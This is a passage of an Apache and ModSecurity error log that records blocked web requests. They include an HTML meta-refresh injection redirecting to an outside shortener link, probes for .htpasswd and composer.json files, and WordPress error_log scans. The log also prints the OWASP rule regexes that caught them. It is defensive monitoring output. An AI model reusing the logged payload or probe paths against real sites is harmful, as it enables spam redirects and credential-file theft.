[Mon May 11 12:40:55.721565 2026] [security2:error] [pid 1256241:tid 1256247] [client 194.233.64.127:53415] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyN5kIEwRJMyDaV55fdQAAAUE"]
[Mon May 11 12:40:55.729934 2026] [security2:error] [pid 1256241:tid 1256247] [client 194.233.64.127:53415] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyN5kIEwRJMyDaV55fdQAAAUE"]
[Mon May 11 12:40:55.737589 2026] [security2:error] [pid 1256241:tid 1256247] [client 194.233.64.127:53415] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyN5kIEwRJMyDaV55fdQAAAUE"]
[Mon May 11 12:40:55.746423 2026] [security2:error] [pid 1256241:tid 1256247] [client 194.233.64.127:53415] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyN5kIEwRJMyDaV55fdQAAAUE"]
[Mon May 11 12:40:55.746837 2026] [security2:error] [pid 1256241:tid 1256247] [client 194.233.64.127:53415] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyN5kIEwRJMyDaV55fdQAAAUE"]
[Mon May 11 12:40:55.747231 2026] [security2:error] [pid 1256241:tid 1256247] [client 194.233.64.127:53415] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyN5kIEwRJMyDaV55fdQAAAUE"]
[Mon May 11 12:40:56.389388 2026] [security2:error] [pid 1254212:tid 1254230] [client 194.233.64.127:53434] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://cleanuri.com/nmbbv1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/nmbbv1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyOEYQeUtAPynIs6xqNQAAABA"]
[Mon May 11 12:40:56.393084 2026] [security2:error] [pid 1254212:tid 1254230] [client 194.233.64.127:53434] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyOEYQeUtAPynIs6xqNQAAABA"]
[Mon May 11 12:40:56.393894 2026] [security2:error] [pid 1254212:tid 1254230] [client 194.233.64.127:53434] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyOEYQeUtAPynIs6xqNQAAABA"]
[Mon May 11 12:40:56.405594 2026] [security2:error] [pid 1254212:tid 1254230] [client 194.233.64.127:53434] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyOEYQeUtAPynIs6xqNQAAABA"]
[Mon May 11 12:40:56.413185 2026] [security2:error] [pid 1254212:tid 1254230] [client 194.233.64.127:53434] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyOEYQeUtAPynIs6xqNQAAABA"]
[Mon May 11 12:40:56.413594 2026] [security2:error] [pid 1254212:tid 1254230] [client 194.233.64.127:53434] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyOEYQeUtAPynIs6xqNQAAABA"]
[Mon May 11 12:40:56.417763 2026] [security2:error] [pid 1254212:tid 1254230] [client 194.233.64.127:53434] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyOEYQeUtAPynIs6xqNQAAABA"]
[Mon May 11 12:40:56.577930 2026] [authz_core:error] [pid 1254328:tid 1254352] [client 94.103.87.20:55514] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/error_log
[Mon May 11 12:40:58.787304 2026] [authz_core:error] [pid 1254328:tid 1254352] [client 94.103.87.20:55514] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/error_log
[Mon May 11 12:41:18.839341 2026] [:error] [pid 1254179:tid 1254182] [client 103.82.21.169:47308] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 12:41:27.340921 2026] [authz_core:error] [pid 1254212:tid 1254217] [client 94.103.87.20:47366] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Compatibility/Plugin/error_log
[Mon May 11 12:41:29.376827 2026] [authz_core:error] [pid 1254212:tid 1254217] [client 94.103.87.20:47366] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Compatibility/Plugin/error_log
[Mon May 11 12:41:31.288867 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:28066] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /static/.htpasswd.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/static/.htpasswd.disabled"] [unique_id "agGyW74KNmD_mZ_vlf9MDwAAAEY"]
[Mon May 11 12:41:31.289210 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:28066] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/static/.htpasswd.disabled"] [unique_id "agGyW74KNmD_mZ_vlf9MDwAAAEY"]
[Mon May 11 12:41:31.377236 2026] [authz_core:error] [pid 1254212:tid 1254217] [client 94.103.87.20:47366] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Compatibility/Plugin/error_log
[Mon May 11 12:41:32.449555 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:28066] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyW74KNmD_mZ_vlf9MDwAAAEY"]
[Mon May 11 12:41:32.476748 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:28076] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /static/.htpasswd.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/static/.htpasswd.disabled"] [unique_id "agGyXGS6k_SCYd1AVZrBwwAAAQQ"]
[Mon May 11 12:41:32.477201 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:28076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/static/.htpasswd.disabled"] [unique_id "agGyXGS6k_SCYd1AVZrBwwAAAQQ"]
[Mon May 11 12:41:33.139663 2026] [authz_core:error] [pid 1254212:tid 1254217] [client 94.103.87.20:47366] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Compatibility/Plugin/error_log
[Mon May 11 12:41:33.701123 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:28076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyXGS6k_SCYd1AVZrBwwAAAQQ"]
[Mon May 11 12:42:08.995181 2026] [authz_core:error] [pid 1254212:tid 1254225] [client 94.103.87.20:44238] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/ElasticEmail/error_log
[Mon May 11 12:42:11.995946 2026] [authz_core:error] [pid 1254212:tid 1254225] [client 94.103.87.20:44238] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/ElasticEmail/error_log
[Mon May 11 12:42:14.214221 2026] [authz_core:error] [pid 1254212:tid 1254225] [client 94.103.87.20:44238] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/ElasticEmail/error_log
[Mon May 11 12:42:16.132099 2026] [authz_core:error] [pid 1254212:tid 1254225] [client 94.103.87.20:44238] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/ElasticEmail/error_log
[Mon May 11 12:42:24.751747 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:35958] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /user/composer.json-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/user/composer.json-old"] [unique_id "agGykBjZymfuKpjWXeiPDAAAAMQ"]
[Mon May 11 12:42:24.752139 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:35958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/user/composer.json-old"] [unique_id "agGykBjZymfuKpjWXeiPDAAAAMQ"]
[Mon May 11 12:42:24.882937 2026] [authz_core:error] [pid 1254179:tid 1254185] [client 94.103.87.20:53186] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Gmail/error_log
[Mon May 11 12:42:25.896682 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:35958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGykBjZymfuKpjWXeiPDAAAAMQ"]
[Mon May 11 12:42:25.923323 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:35966] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /user/composer.json-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/user/composer.json-old"] [unique_id "agGykUYQeUtAPynIs6xqlQAAABQ"]
[Mon May 11 12:42:25.923516 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:35966] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/user/composer.json-old"] [unique_id "agGykUYQeUtAPynIs6xqlQAAABQ"]
[Mon May 11 12:42:27.131184 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:35966] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGykUYQeUtAPynIs6xqlQAAABQ"]
[Mon May 11 12:42:39.887286 2026] [core:error] [pid 1254212:tid 1254233] [client 34.198.2.0:15870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 12:42:39.887592 2026] [core:error] [pid 1254212:tid 1254233] [client 34.198.2.0:15870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
